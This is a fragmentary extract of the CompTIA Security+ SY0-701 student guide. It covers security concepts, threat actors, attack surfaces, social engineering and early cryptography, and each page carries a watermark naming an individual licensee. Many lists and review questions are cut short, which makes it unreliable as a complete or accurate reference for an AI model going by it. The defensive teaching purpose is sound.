Downloadable Official CompTIA Security+ Student Guide
Downloadable Official CompTIA Security+ Student Guide
CompTIA
Security+
Student Guide
(Exam SY0-701)
Acknowledgments
Notices
Disclaimer
While CompTIA, Inc. takes care to ensure the accuracy and quality of these materials, we cannot guarantee their accuracy,
and all materials are provided without any warranty whatsoever, including, but not limited to, the implied warranties of
merchantability or fitness for a particular purpose. The use of screenshots, photographs of another entity’s products, or
another entity’s product name or service in this book is for editorial purposes only. No such use should be construed to imply
sponsorship or endorsement of the book by nor any affiliation of such entity with CompTIA. This courseware may contain
links to sites on the Internet that are owned and operated by third parties (the “External Sites”). CompTIA is not responsible for
the availability of, or the content located on or through, any External Site. Please contact CompTIA if you have any concerns
regarding such links or External Sites.
Trademark Notice
CompTIA®, Security+®, and the CompTIA logo are registered trademarks of CompTIA, Inc., in the U.S. and other countries. All
other product and service names used may be common law or registered trademarks of their respective proprietors.
Copyright Notice
Copyright © 2023 CompTIA, Inc. All rights reserved. Screenshots used for illustrative purposes are the property of the software
proprietor. Except as permitted under the Copyright Act of 1976, no part of this publication may be reproduced or distributed
in any form or by any means, or stored in a database or retrieval system, without the prior written permission of CompTIA,
3500 Lacey Road, Suite 100, Downers Grove, IL 60515-5439.
This book conveys no rights in the software or other products about which it was written; all use or licensing of such software
or other products is the responsibility of the user according to terms and conditions of the owner. If you believe that this
book, related materials, or any other CompTIA materials are being reproduced or transmitted without permission, please call
1-866-835-8020 or visit https://help.comptia.org.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Table of Contents
Table of Contents
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Table of Contents
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Solutions......................................................................................................................... S-1
Glossary...........................................................................................................................G-1
Index................................................................................................................................. I-1
Table of Contents
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Course Description
Course Objectives
This course can benefit you in two ways. If you intend to pass the CompTIA
Security+ (Exam SY0-701) certification examination, this course can be a significant
part of your preparation. But certification is not the only key to professional
success in the field of IT security. Today's job market demands individuals with
demonstrable skills, and the information and activities in this course can help you
build your cybersecurity skill set so that you can confidently perform your duties in
any entry-level security role.
On course completion, you will be able to do the following:
• Summarize fundamental security concepts.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Target Student
The Official CompTIA Security+ (Exam SY0-701) is the primary course you will need to
take if your job responsibilities include safeguarding networks, detecting threats,
and securing data in your organization. You can take this course to prepare for the
CompTIA Security+ (Exam SY0-701) certification examination.
Prerequisites
To ensure your success in this course, you should have a minimum of two years
of experience in IT administration with a focus on security, hands-on experience
with technical information security, and a broad knowledge of security concepts.
CompTIA A+ and CompTIA Network+, or the equivalent knowledge, is strongly
recommended.
The prerequisites for this course might differ significantly from the prerequisites for
the CompTIA certification exams. For the most up-to-date information about the exam
prerequisites, complete the form on this page: www.comptia.org/training/resources/
exam-objectives.
As You Learn
At the top level, this course is divided into lessons, each representing an area of
competency within the target job roles. Each lesson is composed of a number of
topics. A topic contains subjects that are related to a discrete job task, mapped
to objectives and content examples in the CompTIA exam objectives document.
Rather than follow the exam domains and objectives sequence, lessons and topics
are arranged in order of increasing proficiency. Each topic is intended to be studied
within a short period (typically 30 minutes at most). Each topic is concluded by one
or more activities, designed to help you to apply your understanding of the study
notes to practical scenarios and tasks.
In addition to the study content in the lessons, there is a glossary of the terms and
concepts used throughout the course. There is also an index to assist in locating
particular terminology, concepts, technologies, and tasks within the lesson and
topic content.
In many electronic versions of the book, you can click links on key words in the topic
content to move to the associated glossary definition, and on page references in the
index to move to that term in the content. To return to the previous location in the
document after clicking a link, use the appropriate functionality in your eBook
viewing software.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
As You Review
Any method of instruction is only as effective as the time and effort you, the
student, are willing to invest in it. In addition, some of the information that you
learn in class may not be important to you immediately, but it may become
important later. For this reason, we encourage you to spend some time reviewing
the content of the course after your time in the classroom.
Following the lesson content, you will find a table mapping the lessons and topics
to the exam domains, objectives, and content examples. You can use this as a
checklist as you prepare to take the exam and to review any content that you are
uncertain about.
As a Reference
The organization and layout of this book make it an easy-to-use resource for future
reference. Guidelines can be used during class and as after-class references when
you're back on the job and need to refresh your understanding. Taking advantage
of the glossary, index, and table of contents, you can use this book as a first source
of definitions, background information, and summaries.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LESSON INTRODUCTION
Security is an ongoing process that includes assessing requirements, setting
up organizational security systems, hardening and monitoring those systems,
responding to attacks in progress, and deterring attackers. If you can summarize
the fundamental concepts that underpin security functions, you can contribute
more effectively to a security team. You must also be able to explain the importance
of compliance factors and best practice frameworks in driving the selection of
security controls and how departments, units, and professional roles within
different types of organizations implement the security function.
Lesson Objectives
In this lesson, you will do the following:
• Summarize information security concepts.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 1A
Security Concepts
2
Information Security
Information security (infosec) refers to the protection of data resources from
unauthorized access, attack, theft, or damage. Data may be vulnerable because of
the way it is stored, transferred, or processed. The systems used to store, transmit,
and process data must demonstrate the properties of security. Secure information
has three properties, often referred to as the CIA Triad:
• Confidentiality means that information can only be read by people who have
been explicitly authorized to access it.
• Integrity means that the data is stored and transferred as intended and that
any modification is authorized.
The triad can also be referred to as "AIC" to avoid confusion with the Central Intelligence
Agency.
Some security models and researchers identify other properties of secure systems.
The most important of these is non-repudiation. Non-repudiation means that a
person cannot deny doing something, such as creating, modifying, or sending a
resource. For example, a legal document, such as a will, must usually be witnessed
when it is signed. If there is a dispute about whether the document was correctly
executed, the witness can provide evidence that it was.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Cybersecurity Framework
Within the goal of ensuring information security, cybersecurity refers specifically
to provisioning secure processing hardware and software. Information security
and cybersecurity tasks can be classified as five functions, following the framework
developed by the National Institute of Standards and Technology (NIST) (nist.
gov/cyberframework/online-learning/five-functions):
• Identify—develop security policies and capabilities. Evaluate risks, threats, and
vulnerabilities and recommend security controls to mitigate them.
NIST’s framework is just one example. There are many other cybersecurity
frameworks (CSF).
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Gap Analysis
Each security function is associated with a number of goals or outcomes. For
example, one outcome of the Identify function is an inventory of the assets owned
and operated by the company. Outcomes are achieved by implementing one or
more security controls.
Numerous categories and types of security controls cover a huge range of
functions. This makes selection of appropriate and effective controls difficult.
A cybersecurity framework guides the selection and configuration of controls.
Frameworks are important because they save an organization from building its
security program in a vacuum, or from building the program on a foundation that
fails to account for important security concepts.
The use of a framework allows an organization to make an objective statement
of its current cybersecurity capabilities, identify a target level of capability, and
prioritize investments to achieve that target. This gives a structure to internal
risk management procedures and provides an externally verifiable statement of
regulatory compliance.
Gap analysis is a process that identifies how an organization’s security systems
deviate from those required or recommended by a framework. This will be
performed when first adopting a framework or when meeting a new industry or
legal compliance requirement. The analysis might be repeated every few years to
meet compliance requirements or to validate any changes that have been made to
the framework.
For each section of the framework, a gap analysis report will provide an overall
score, a detailed list of missing or poorly configured controls associated with that
section, and recommendations for remediation.
Summary of gap analysis findings showing number of recommended controls not implemented
per function and category; plus risks to confidentiality, integrity, and availability from missing
controls; and target remediation date.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
While some or all work involved in gap analysis could be performed by the internal
security team, a gap analysis is likely to involve third-party consultants. Frameworks
and compliance requirements from regulations and legislation can be complex enough
to require a specialist. Advice and feedback from an external party can alert the internal
security team to oversights and to new trends and changes in best practice.
Access Control
An access control system ensures that an information system meets the goals of
the CIA triad. Access control governs how subjects/principals may interact with
objects. Subjects are people, devices, software processes, or any other system
that can request and be granted access to a resource. Objects are the resources.
An object could be a network, server, database, app, or file. Subjects are assigned
rights or permissions on resources.
Modern access control is typically implemented as an identity and access
management (IAM) system. IAM comprises four main processes:
• Identification—creating an account or ID that uniquely represents the user,
device, or process on the network.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
The servers and protocols that implement these functions can also be referred to as
authentication, authorization, and accounting (AAA). The use of IAM to describe
enterprise security workflows is becoming more prevalent as the importance of the
identification process is better acknowledged.
For example, if you are setting up an e-commerce site and want to enroll users, you
need to select the appropriate controls to perform each function:
• Identification—ensure that customers are legitimate. For example, you might
need to ensure that billing and delivery addresses match and that they are not
trying to use fraudulent payment methods.
• Accounting—the system must record the actions a customer takes (to ensure
that they cannot deny placing an order, for instance).
Remember that these processes apply both to people and to systems. For example,
you need to ensure that your e-commerce server can authenticate its identity when
customers connect to it using a web browser.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Security Concepts
3
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 1B
Security Controls
7
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Although it uses a different scheme, be aware of the way the National Institute of
Standards and Technology (NIST) classifies security controls (csrc.nist.gov/publications/
detail/sp/800-53/rev-5/final).
• Detective—the control may not prevent or deter access, but it will identify and
record an attempted or successful intrusion. A detective control operates during
an attack. Logs provide one of the best examples of detective-type controls.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Managers may have responsibility for a domain, such as building control, web
services, or accounting.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Nontechnical staff have the responsibility of complying with policy and with any
relevant legislation.
• External responsibility for security (due care or liability) lies mainly with directors
or owners, though again it is important to note that all employees share some
measure of responsibility.
NIST's National Initiative for Cybersecurity Education (NICE) categorizes job tasks and
job roles within the cybersecurity industry (gov/itl/applied-cybersecurity/nice/nice-
framework-resource-center).
• Set up and maintain document access control and user privilege profiles.
• Monitor audit logs, review user privileges, and document access controls.
• Create and test business continuity and disaster recovery plans and procedures.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
A security operations center (SOC) provides resources and personnel to implement rapid incident
detection and response, plus oversight of cybersecurity operations.
(Image © gorodenkoff 123RF.com.)
DevSecOps
Network operations and use of cloud computing make ever-increasing use of
automation through software code. Traditionally, software code would be the
responsibility of a programming or development team. Separate development and
operations departments or teams can lead to silos, where each team does not work
effectively with the other.
Development and operations (DevOps) is a cultural shift within an organization
to encourage much more collaboration between developers and systems
administrators. By creating a highly orchestrated environment, IT personnel
and developers can build, test, and release software faster and more reliably.
DevSecOps extends the boundary to security specialists and personnel, reflecting
the principle that security is a primary consideration at every stage of software
development and deployment. This is also known as shift left, meaning that
security considerations need to be made during requirements and planning
phases, not grafted on at the end. The principle of DevSecOps recognizes this and
shows that security expertise must be embedded into any development project.
Ancillary to this is the recognition that security operations can be conceived of as
software development projects. Security tools can be automated through code.
Consequently, security operations need to take on developer expertise to improve
detection and monitoring.
Incident Response
A dedicated computer incident response team (CIRT)/computer security incident
response team (CSIRT)/computer emergency response team (CERT) is a single point
of contact for the notification of security incidents. This function might be handled
by the SOC or it might be established as an independent business unit.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Security Controls
8
around its premises. What class and function is this security control?
intellectual property (IP) data, plus personal data for its customers and
account holders. What type of business unit can be used to manage such
important and complex security requirements?
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Lesson 1
Summary
7
You should be able to compare and contrast security controls using categories and
functional types. You should also be able to explain how general security concepts
and frameworks are used to develop and validate security policies and control
selection.
• Assign roles so that security tasks and responsibilities are clearly understood
and that impacts to security are assessed and mitigated across the organization.
• Identify and assess the laws and industry regulations that impose compliance
requirements on your business.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LESSON INTRODUCTION
To make an effective security assessment, you must be able to explain strategies
for both defense and attack. Your responsibilities are likely to lie principally in
defending assets, but to do this you must be able to explain the tactics, techniques,
and procedures of threat actors. You must also be able to differentiate the types
and capabilities of threat actors and the ways they can exploit the attack surface
that your networks and systems expose.
Lesson Objectives
In this lesson, you will do the following:
• Compare and contrast attributes and motivations of threat actor types.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 2A
Threat Actors
2
When you assess your organization’s security posture, you must apply the concepts of
vulnerability, threat, and risk. Risk is a measure of the likelihood and impact of a threat
actor being able to exploit a vulnerability in your organization’s security systems.
To evaluate these factors, you must be able to evaluate the sources of threats or
threat actors. This topic will help you to classify and evaluate the motivation and
capabilities of threat actor types so that you can assess and mitigate risks more
effectively.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Internal/External
Internal/external refers to the degree of access that a threat actor posseses
before initiating an attack. An external threat actor has no account or authorized
access to the target system. A malicious external threat must infiltrate the security
system using unauthorized access, such as breaking into a building or hacking
into a network. Note that an external actor may perpetrate an attack remotely or
on-premises. It is the threat actor that is external rather than the attack method.
Conversely, an internal/insider threat actor has been granted permissions on the
system. This typically means an employee, but insider threats can also arise from
contractors and business partners.
Level of Sophistication/Capability
Level of sophistication/capability refers to a threat actor’s ability to use advanced
exploit techniques and tools. The least capable threat actor relies on commodity
attack tools that are widely available. More capable actors can fashion new exploits
in operating systems, applications software, and embedded control systems. At the
highest level, a threat actor might use non-cyber tools such as political or military
assets.
Resources/Funding
A high level of capability must be supported by resources/funding. Sophisticated
threat actor groups need to be able to acquire resources, such as customized attack
tools and skilled strategists, designers, coders, hackers, and social engineers. The
most capable threat actor groups receive funding from nation-states and organized
crime.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
You can relate these strategies to the way they affect the CIA triad: data exfiltration
compromises confidentiality, disinformation attacks integrity, and service disruption
targets availability.
Chaotic Motivations
In the early days of the Internet, many service disruption and disinformation attacks
were perpetrated with the simple goal of causing chaos. Hackers might deface
websites or release worms that brought corporate networks to a standstill for no
other reason than to gain credit for the hack.
This type of vandalism for its own sake is less prevalent now. Attackers might use
service disruption and disinformation to further political ends, or nation-states
might use it to further war aims. Another risk is threat actors motivated by revenge.
Revenge attacks might be perpetrated by an employee or former employee or by
any external party with a grievance.
Financial Motivations
As hacking and malware became both more sophisticated and better commodified,
the opportunities to use them for financial gain grew quickly. If an attacker is able to
steal data, they might be able to sell it to other parties. Alternatively, they might use
an attack to threaten the victim with blackmail or extortion or to perpetrate fraud:
• Blackmail is demanding payment to prevent the release of information. A threat
actor might have stolen information or created false data that makes it appear
as though the target has committed a crime.
• Fraud is falsifying records. Internal fraud might involve tampering with accounts
to embezzle funds or inventing customer details to launder money. Criminals
might use disinformation to commit fraud, such as posting fake news to affect
the share price of a company, promote pyramid schemes, or to create fake
companies.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Political Motivations
A political motivation means that the threat actor uses an attack to bring about
some type of change in society or governance. This can cover a very wide range of
motivations:
• An employee acting as a whistleblower because of some ethical concern about
the organization’s behavior.
There is also the threat of commercial espionage, where a company attempts to steal
the secrets of a competitor.
Hackers
Hacker describes an individual who has the skills to gain access to computer
systems through unauthorized or unapproved means. Originally, hacker was a
neutral term for a user who excelled at computer programming and computer
system administration. Hacking into a system was a sign of technical skill and
creativity that gradually became associated with illegal or malicious system
intrusions. The terms unauthorized (previously known as black hat) and
authorized (previously known as white hat) are used to distinguish these
motivations. A white hat hacker always seeks authorization to perform penetration
testing of private and proprietary systems.
Unskilled Attackers
An unskilled attacker is someone who uses hacker tools without necessarily
understanding how they work or having the ability to craft new attacks. Unskilled
attacks might have no specific target or any reasonable goal other than gaining
attention or proving technical abilities.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Nation-State Actors
Most nation-states have developed cybersecurity expertise and will use cyber
weapons to achieve military and commercial goals. The security company
Mandiant’s APT1 report into Chinese cyber espionage units shaped the language
and understanding of cyber-attack lifecycles.
The term advanced persistent threat (APT) was coined to understand the
behavior underpinning modern types of cyber adversaries. Rather than think in
terms of systems being infected with a virus or Trojan, an APT refers to the ability
of an adversary to achieve ongoing compromise of network security—to obtain and
maintain access—using a variety of tools and techniques.
Nation-state actors have been implicated in many attacks, particularly on energy,
health, and electoral systems. The goals of state actors are primarily disinformation
and espionage for strategic advantage, but it is a known for countries—North Korea
being a good example—to target companies for financial gain.
Researchers such as The MITRE Corporation report on the activities of organized crime and
nation-state actors. (Screenshot © 2023 The MITRE Corporation. This work is reproduced
and distributed with the permission of The MITRE Corporation.)
State actors will work at arm’s length from the national government, military, or
security service that sponsors and protects them, maintaining “plausible deniability.”
They are likely to pose as independent groups or even as hacktivists. They may
wage false flag disinformation campaigns that try to implicate other states.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
There is the blurred case of former insiders, such as ex-employees now working at
another company or who have been dismissed and now harbor a grievance. These can
be classified as internal threats or treated as external threats with insider knowledge,
and possibly some residual permissions, if effective offboarding controls are not
in place.
The main motivators for a malicious internal threat actor are revenge and financial
gain. Like external threats, insider threats can be opportunistic or targeted. An
employee who plans and executes a campaign to modify invoices and divert funds
is launching a structured attack; an employee who tries to guess the password
on the salary database a couple of times, having noticed that the file is available
on the network, is perpetrating an opportunistic attack. You must also assess the
possibility that an insider threat may be working in collaboration with an external
threat actor or group.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Threat Actors
3
at one of your application servers. The email suggests you engage the
hacker for a day’s consultancy to patch the vulnerability. How should
you categorize this threat?
political change?
5. Which three types of threat actor are most likely to have high levels of
5.
funding?
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 2B
Attack Surfaces
6
Understanding the methods by which threat actors infiltrate networks and systems
is essential for you to assess the attack surface of your networks and deploy
controls to block attack vectors.
An organization has an overall attack surface. You can also assess attack surfaces at
more limited scopes, such as that of a single server or computer, a web application, or
employee identities and accounts.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
To evaluate the attack surface, you need to consider the attributes of threat actors
that pose the most risk to your organization. For example, the attack surface for an
external actor should be far smaller than that for an insider threat.
From a threat actor’s perspective, each part of the attack surface represents a
potential vector for attempting an intrusion. A threat vector is the path that a
threat actor uses to execute a data exfiltration, service disruption, or disinformation
attack. Sophisticated threat actors will make use of multiple vectors. They are likely
to plan a multistage campaign, rather than a single “smash and grab” type of raid.
Highly capable threat actors will be able to develop novel vectors. This means that
the threat actor’s knowledge of your organization’s attack surface may be better
than your own.
The terms "threat vector" and "attack vector" are often taken to mean the same thing.
Some sources distinguish the use of threat vector to refer to analysis of the potential
attack surface and attack vector to analyze an exploit that has been successfully
executed.
One strategy for dealing with unsupported apps that cannot be replaced is to try to
isolate them from other systems. The idea is to reduce opportunities for a threat actor
to access the vulnerable app and run exploit code. Using isolation as a substitute for
patch management is an example of a compensating control.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Network Vectors
Vulnerable software gives a threat actor the opportunity to execute malicious code
on a system. To do this, the threat actor must be able to run exploit code on the
system or over a network to trigger the vulnerability. An exploit technique for any
given software vulnerability can be classed as either remote or local:
• Remote means that the vulnerability can be exploited by sending code to the
target over a network and does not depend on an authenticated session with the
system to execute.
• Local means that the exploit code must be executed from an authenticated
session on the computer. The attack could still occur over a network, but the
threat actor needs to use some valid credentials or hijack an existing session to
execute it.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Cloud Access—many companies now run part or all of their network services via
Internet-accessible clouds. The attacker only needs to find one account, service,
or host with weak credentials to gain access. The attacker is likely to target the
accounts used to develop services in the cloud or manage cloud systems. They
may also try to attack the cloud service provider (CSP) as a way of accessing the
victim system.
Servers have to open necessary ports to make authorized network applications and
services work. However, as part of reducing the attack surface, servers should not be
configured to allow traffic on any unnecessary ports. Networks can use secure design
principles, access control, firewalls, and intrusion detection to reduce the attack surface.
Lure-Based Vectors
A lure is something superficially attractive or interesting that causes its target to
want it, even though it may be concealing something dangerous, like a hook. In
cybersecurity terms, when the target opens the file bait, it delivers a malicious
payload hook that will typically give the threat actor control over the system or
perform service disruption.
If the threat actor cannot gain sufficient access to run a remote or local exploit
directly, a lure might trick a user into facilitating the attack. The following media are
commonly used as lures:
• Removable Device—the attacker conceals malware on a USB thumb drive or
memory card and tries to trick employees into connecting the media to a PC,
laptop, or smartphone. For some exploits, simply connecting the media may
be sufficient to run the malware. More typically, the attacker may need the
employee to open a file in a vulnerable application or run a setup program.
In a drop attack, the threat actor simply leaves infected USB sticks in office grounds,
reception areas, or parking lots in the expectation that at least one employee will pick
one up and plug it into a computer.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Image Files—the threat actor conceals exploit code within an image file that
targets a vulnerability in browser or document editing software.
These vectors expose a large and diverse attack surface, from the USB and flash
card readers installed on most computers to the software used to browse websites
and view/edit documents. Reducing this attack surface requires effective endpoint
security management, using controls such as vulnerability management, antivirus,
program execution control, and intrusion detection.
Message-Based Vectors
When using a file-based lure, the threat actor needs a mechanism to deliver the
file and a message that will trick a user into opening the file on their computer.
Consequently, any features that allow direct messaging to network users must be
considered as part of the potential attack surface:
• Email—the attacker sends a malicious file attachment via email, or via any other
communications system that allows attachments. The attacker needs to use
social engineering techniques to persuade or trick the user into opening the
attachment.
• Short Message Service (SMS)—the file or a link to the file is sent to a mobile
device using the text messaging handler built into smartphone firmware
and a protocol called Signaling System 7 (SS7). SMS and the SS7 protocol are
associated with numerous vulnerabilities. Additionally, an organization is unlikely
to have any monitoring capability for SMS as it is operated by the handset or
subscriber identity module (SIM) card provider.
• Instant Messaging (IM)—there are many replacements for SMS that run on
Windows, Android, or iOS devices. These can support voice and video messaging
plus file attachments. Most of these services are secured using encryption and
offer considerably more security than SMS, but they can still contain software
vulnerabilities. The use of encryption can make it difficult for an organization to
scan messages and attachments for threats.
The most powerful exploits are zero-click. Most file-based exploit code has to be
deliberately opened by the user. Zero-click means that simply receiving an attachment
or viewing an image on a webpage triggers the exploit.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
For most businesses, use of reputable vendors will represent the best practical effort at
securing the supply chain. Government, military/security services, and large enterprises
will exercise greater scrutiny. Particular care should be taken if using secondhand
machines.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Attack Surfaces
7
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 2C
Social Engineering
4
Human Vectors
Adversaries can use a diverse range of techniques to compromise a security system.
A prerequisite of many types of attacks is to obtain information about the network
and security system. This knowledge is not only stored on computer disks; it also
exists in the minds of employees and contractors. The people operating computers
and accounts are a part of the attack surface referred to as human vectors.
Social engineering refers to means of either eliciting information from someone
or getting them to perform some action for the threat actor. It can also be referred
to as “hacking the human.” A threat actor might use social engineering to gather
intelligence as reconnaissance in preparation for an intrusion or to effect an actual
intrusion by obtaining account credentials or persuading the target to run malware.
There are many diverse social engineering strategies, but to illustrate the concept,
consider the following scenarios:
• A threat actor creates an executable file that prompts a network user for their
password and then records whatever the user inputs. The attacker then emails
the executable file to the user with the story that the user must open the file and
log on to the network again to clear up some login problems the organization
has been experiencing that morning. After the user complies, the attacker now
has access to their network credentials.
• A threat actor triggers a fire alarm and then slips into the building during the
confusion and attaches a monitoring device to a network port.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
The classic impersonation attack is for the social engineer to phone into a
department, claim they have to adjust something on the user’s system remotely,
and then get the user to reveal their password.
Do you really know who's on the other end of the line? (Image © 123RF.com.)
The use of a carefully crafted story with convincing or intimidating details is referred
to as pretexting. Making a convincing impersonation to either charm or intimidate
a target usually depends on the attacker obtaining privileged information about
the organization. For example, when the attacker impersonates a member of the
organization’s IT support team, the attack will be more effective with the identity
details of the person being impersonated and the target.
Some social engineering techniques are dedicated to obtaining this type of
intelligence as a reconnaissance activity. As most companies are set up toward
customer service rather than security, this information is typically quite easy to
come by. Information that might seem innocuous—such as department employee
lists, job titles, phone numbers, diaries, invoices, or purchase orders—can help an
attacker penetrate an organization through impersonation.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Example phishing email—On the right, you can see the message in its true form
as the mail client has stripped out the formatting (shown on the left)
designed to disguise the nature of the links.
Phishing refers specifically to email or text message threat vectors. The same sort of
attack can be performed over other types of media:
• Vishing—a phishing attack conducted through a voice channel (telephone or
VoIP, for instance). For example, targets could be called by someone purporting
to represent their bank asking them to verify a recent credit card transaction and
requesting their security details. It can be much more difficult for someone to
refuse a request made in a phone call compared to one made in an email.
Rapid improvements in deep fake technology are likely to make phishing attempts via
voice and even video messaging more prevalent in the future.
• SMiShing—a phishing attack that uses simple message service (SMS) text
communications as the vector.
Direct messages to a single contact have a high chance of failure. Other social
engineering techniques still use spoofed resources, such as fake sites and login
pages, but rely on redirection or passive methods to entrap victims.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Typosquatting
Phishing and pharming both depend on impersonation to succeed. The spoofed
message or site must appear to derive from a source that the target trusts. A
threat actor can use various inconsistencies in the way the message’s source is
represented in a mail client to trick the target into trusting the message source.
Email client software does not always identify the actual email address used to
send the message. Instead, it displays a “From” field where a threat actor can add
an arbitrary value. This technique is less common now as filtering software can be
configured to alert the user to any discrepancy between the actual and claimed
sender addresses.
Typosquatting means that the threat actor registers a domain name very similar
to a real one, such as exannple.com, hoping that users will not notice the difference
and assume they are browsing a trusted site or receiving email from a known
source. These are also referred to as cousin, lookalike, or doppelganger domains.
Another technique is to register a hijacked subdomain using the primary domain
of a trusted cloud provider, such as onmicrosoft.com. If a phishing message
appears to come from example.onmicrosoft.com, many users will be
inclined to trust it.
Some sources use the term "business email compromise" to mean an attack with a
specific financial motivation, where the objective is to persuade a budget holder to
authorize a fraudulent payment or wire transfer. Similar terminology for highly targeted
attacks includes spear phishing, whaling, CEO fraud (impersonating the CEO), and
angler phishing (using social media as the vector).
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Social Engineering
5
1. The help desk takes a call, and the caller states that she cannot connect
to the e-commerce website to check her order status. She would also
like a username and password. The user gives a valid customer company
name but is not listed as a contact in the customer database. The user
does not know the correct company code or customer ID. Is this likely to
be a social engineering attempt, or is it a false alarm?
4. A company policy states that any wire transfer above a certain value
must be authorized by two employees, who must separately perform
due diligence to verify invoice details. What specific type of social
engineering is this policy designed to mitigate?
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Lesson 2
Summary
5
You should be able to explain how to assess external and insider threat actor types
in terms of intent and capability. You should also be able to summarize the vectors
that make up an organization’s attack surface.
• Use research to extend understanding of the attack surface into specific threat
vectors such as vulnerable software, unsecure networks, supply chain, and
message-based attacks and lures that target the human vector.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LESSON INTRODUCTION
The protect cybersecurity function aims to build secure IT processing systems that
exhibit the attributes of confidentiality, integrity, and availability. Many of these
systems depend wholly or in part on cryptography.
As an information security professional, you must understand the concepts
underpinning cryptographic algorithms and their implementation in secure
protocols and services. A strong technical understanding of the subject will enable
you to explain the importance of cryptographic systems and to select appropriate
technologies to meet a given security goal.
Lesson Objectives
In this lesson, you will do the following:
• Compare and contrast cryptographic algorithms.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 3A
Cryptographic Algorithms
2
Cryptographic Concepts
Cryptography, which literally means “secret writing,” is the art of making
information secure by encoding it. This is the opposite of security through
obscurity. Security through obscurity means keeping something a secret by hiding
it. This is considered impossible (or at least high risk) on a computer system. With
cryptography, it does not matter if third parties know of the existence and location
of the secret, because they can never understand what it is without the means to
decode it.
The following terminology is used to discuss cryptography:
• Plaintext (or cleartext)—is an unencrypted message.
There are three main types of cryptographic algorithms with different roles to play
in the assurance of the security properties confidentiality, integrity, availability, and
non-repudiation. These types are hashing algorithms and two types of encryption
ciphers: symmetric and asymmetric.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Symmetric Encryption
An encryption algorithm or cipher is a type of cryptographic process that encodes
data so that it can be stored or transmitted securely and then decrypted only by its
owner or its intended recipient. Using a key with the encryption cipher ensures that
decryption can only be performed by an authorized person.
Symmetric Algorithms
A symmetric algorithm is one in which encryption and decryption are both
performed by the same secret key. The secret key must be kept known to
authorized persons only. If the key is lost or stolen, the security is breached.
Symmetric encryption is used for confidentiality. For example, Alice and Bob can
share a confidential file in the following way:
1. Alice and Bob meet to agree which cipher to use and a secret key value. They
both record the value of the secret key, making sure that no one else can
discover it.
4. Bob receives the ciphertext and is able to decrypt it by applying the same
cipher with his copy of the secret key.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Symmetric encryption is very fast. It is used for bulk encryption of large amounts of
data. The main problem is how Alice and Bob “meet” to agree upon or exchange the
key. If Mallory intercepts the key and obtains the ciphertext, the security is broken.
Note that symmetric encryption cannot be used for authentication or integrity. Alice and
Bob are able to create exactly the same secrets, because they both know the same key.
Key Length
Encryption algorithms use a key to increase the security of the process. For
example, if you consider the substitution cipher ROT13, you should realize that the
